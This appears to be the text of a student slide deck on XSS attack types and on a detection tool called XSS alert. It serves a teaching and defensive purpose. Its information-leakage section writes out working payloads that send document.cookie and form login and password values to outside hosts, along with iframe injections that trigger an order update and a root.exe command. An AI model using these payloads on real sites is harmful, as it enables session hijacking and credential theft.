Cross Side Scripting (XSS) attack detection for web application

http://sourceforge.net/projects/xssalert7/

Author: Arjun Jain (07104701) Department of Computer Science and Information Technology Jaypee Institute of Information Technology Sector-62 Noida ,Uttar Pradesh

Agenda

Overview of XSS attack Type of XSS attack Example Limitation of attack DOM security overview XSS alert working model Demo

What is Cross Side Scripting (XSS)

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client side script into web pages viewed by other. Types: 1: Reflected XSS 2: Stored XSS

3: DOM based XSS

Ranked #1 in OWASP 2007 top 10 Ranked #2 in OWASP 2010 top 10

7 out of 10 sites have XSS ( Jeremiah Grossman, White Hat website security statistics report, Oct 2007 )

Reflected XSS
It detect all non-persistent XSS issues which occur when a web application blindly echo parts of the HTTP request in the corresponding HTTP response HTML. Example : <?php $name= request.getParameter(name); echo Hey.$name; ?> $name may contain javascript.

Stored XSS
It refers to all XSS vulnerabilities, where the adversary is able to permanently inject the malicious script in the vulnerable application storage . The result is every user that accesses the poisoned web page received the injected script without further action by the adversary.

DOM-based XSS
It is special variant of the reflected XSS, where logic errors in legitimate JavaScript and careless usage of the client-side data result in XSS coordination.

Example

Invalidated input with XSS

Invalidated input with XSS

Invalidated input in XSS

Invalidated input in XSS

Invalidated Input and resulted in a Cross-Site Scripting attack and the theft of the administrators Cookies.

Types of Information leakage

Client can reveal cookies to 3rd party (session state, order info, etc) http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgibin/cookie.cgi?'%20+document.cookie</script > Client can reveal posted form items to 3rd party (userID/passwd, etc) <form> action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image; hackImg.src='http://www.malicioussite.com/'+document.forms(1).login.value'+':'+ document.forms(1).password.value;" </form> Client can be tricked into accessing/posting spoofed info to trusted server www.trustedserver.com/xss.asp?name = <iframe http://www.trustedserver.com/auth_area/orderupdate?items=4000 > </iframe> Client can be tricked into attacking other sites /hello.asp?name = <iframe src= http://vuln.iis.server/scripts/root.exe?/c+dir ></iframe>

Limitation of these attacks

Usually only get one transaction with XSS code against vulnerable site Most attacks are only focused on collecting cookies

POST based forms are seldom leveraged almost always use GET methods
Attacker does not know actual responses to client Some experts recommend using POST, hidden form inputs and other session state info to limit XSS risks.

DOM Security Overview

Child windows and same site trust Scripts can interact between the two windows Script content can be loaded from anywhere (RPC/Remote scripting is common) Images can be loaded from anywhere

Javascript can either be within <script></script> tags, loaded elsewhere via

<script src=remote.com>, or attacked to many tags <img src=javascriptn load=javascript>

Form GET/POST can be to another site or a javascript action XSS allows DOM abuse, but still follows DOM rules

XSS alert working model

Demo

Attack on Yahoo server with get string ?q=

Final Result

Thank You !